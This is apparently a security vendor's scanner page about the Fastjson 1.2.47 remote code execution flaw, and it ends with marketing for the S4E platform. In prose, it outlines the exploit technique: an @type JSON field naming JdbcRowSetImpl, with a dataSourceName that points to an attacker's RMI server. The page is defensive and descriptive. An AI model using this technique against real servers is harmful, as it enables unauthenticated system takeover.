Fastjson 1.2.47 Remote Code Execution Vulnerability Scanner
Detects 'Remote Code Execution (RCE)' vulnerability in Fastjson version 1.2.47
Short Info
Level
Critical
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 second
Time Interval
4 week
Scan only one
Domain, Ipv4
Toolbox
-
Fastjson is a highly performant JSON library for Java, extensively used across various Java applications for parsing and generating JSON data efficiently. It's favored in environments requiring rapid processing of JSON for web APIs, microservices, and data interchange purposes. Fastjson simplifies the task of converting between Java objects and JSON strings, making it integral to modern Java-based software development. However, certain versions like 1.2.47 have vulnerabilities that expose applications to significant security risks, underscoring the importance of maintaining up-to-date libraries.
The critical remote code execution vulnerability in Fastjson 1.2.47 arises from the library's handling of deserialization of untrusted data. This vulnerability allows attackers to execute arbitrary code remotely by crafting malicious JSON payloads that exploit Fastjson's deserialization mechanism. The exploit leverages Fastjson's feature of instantiating Java objects based on JSON input, which, if not properly sanitized, can lead to execution of malicious code on the server. This severe vulnerability, with a CVSS score of 10, highlights the potential for significant impact on affected systems.
The exploit involves a JSON payload that uses the @type key to specify a Java class that can be abused to execute arbitrary remote code. Specifically, the payload directs Fastjson to instantiate the com.sun.rowset.JdbcRowSetImpl class with a dataSourceName property set to an attacker-controlled RMI (Remote Method Invocation) server. This triggers the vulnerable application to connect to the remote server and execute code specified by the attacker. The exploitation process demonstrates the dangers of deserializing untrusted data without adequate validation or restrictions.
Successful exploitation of this vulnerability can lead to complete system compromise, allowing attackers to perform various malicious activities such as data theft, system manipulation, and further network exploitation. The ability for remote code execution without the need for authentication or user interaction makes this vulnerability particularly severe, posing a critical threat to the confidentiality, integrity, and availability of affected systems.
S4E provides an advanced cybersecurity platform to detect vulnerabilities like the RCE in Fastjson 1.2.47. Our comprehensive scanning tools offer in-depth vulnerability assessments, empowering users with actionable insights and detailed remediation guidelines. By joining our platform, you gain access to continuous monitoring and expert support, enhancing your security posture and protecting your digital assets from emerging threats. Ensure your systems are safeguarded against critical vulnerabilities with S4E.
References